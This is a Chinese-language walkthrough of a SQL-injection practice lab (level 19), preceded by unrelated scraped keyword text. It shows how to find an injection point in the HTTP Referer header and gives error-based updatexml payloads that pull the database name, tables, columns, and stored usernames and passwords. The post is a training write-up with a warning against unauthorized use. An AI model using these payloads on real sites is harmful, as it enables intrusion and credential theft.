石柱县建设局网站,珠海网站建设方案维护,凡客的意思,平台公司和国企的区别文章目录 前言一、回顾上一关知识点二、靶场第十九关通关思路1、判断注入点2、爆数据库名3、爆数据库表4、爆数据库列5、爆数据库关键信息 总结 前言
此文章只用于学习和反思巩固sql注入知识#xff0c;禁止用于做非法攻击。注意靶场是可以练习的平台#xff0c;不能随意去尚… 文章目录 前言一、回顾上一关知识点二、靶场第十九关通关思路1、判断注入点2、爆数据库名3、爆数据库表4、爆数据库列5、爆数据库关键信息 总结 前言
此文章只用于学习和反思巩固sql注入知识禁止用于做非法攻击。注意靶场是可以练习的平台不能随意去尚未授权的网站做渗透测试 一、回顾上一关知识点
上一关我们通过http头部的user-agent值进行注入了解了http头部的一些常见可以注入的地方。这一关同样也是http头部注入只不过不是user-agent了。这一关我就不先看源码了有了上一关经验。
二、靶场第十九关通关思路
1、判断注入点2、爆数据库名3、爆数据库表4、爆数据库列5、爆数据库关键信息
1、判断注入点
这里发现19关页面和上一关基本没区别我们这里用一个测试账号登录(用admin)。因为登录才能记录用户的信息。(如图所示) 这里发现页面回显了一个referer字段从上一关讲解可以知道referer字段是http请求头部内容之一。它的作用是来记录你源地址url的因为我没有跳转到其他页面就是在第十九关页面输信息。所以referer字段就是第十九关的地址。因为页面带回的这个referer字段内容那么可想而知会不会是后台管理员把referer拼接到数据库后回显到web页面的呢我们不妨试一试 用 and 11和and 12 发现页面正常排除数字型。(如图所示)
直接提交单引号发现页面报错报错语句为 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘xxx.xxx.xxx.xxx’)’ at line 1 通过报错语句可以猜测原始语句应该是
(refer,ip)因为我们多了一个单引号所以报错了我们尝试构造payload 也就是
1,1)#那么在原始语句就是
(refer,1)#,ip)这样就构造成功了页面正常(如图所示) 现在我们来看源代码看看是不是这么回事 发现是和我们想到的语句一样。因为有报错回显无回显数据内容所以用报错盲注。
2、爆数据库名
注入语句为
1 and updatexml(1,concat(0x3a,(select database()),0x3a),1),1)#3、爆数据库表
注入语句为
1 and updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schemadatabase() limit 3,1),0x3a),1),1)#得到关键数据库表名users
4、爆数据库列
注入语句为
1 and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 1,1),0x3a),1),1)#1 and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 2,1),0x3a),1),1)#得到关键数据库列usernamepassword
5、爆数据库关键信息
注入语句为
1 and updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1),1)#1 and updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1),1)#得到账号密码 总结
这一关也是通过http头部注入只是注入点不同。只要知道原理和怎么构造payload的话基本没什么问题。此文章是小白自己为了巩固sql注入而写的大佬路过请多指教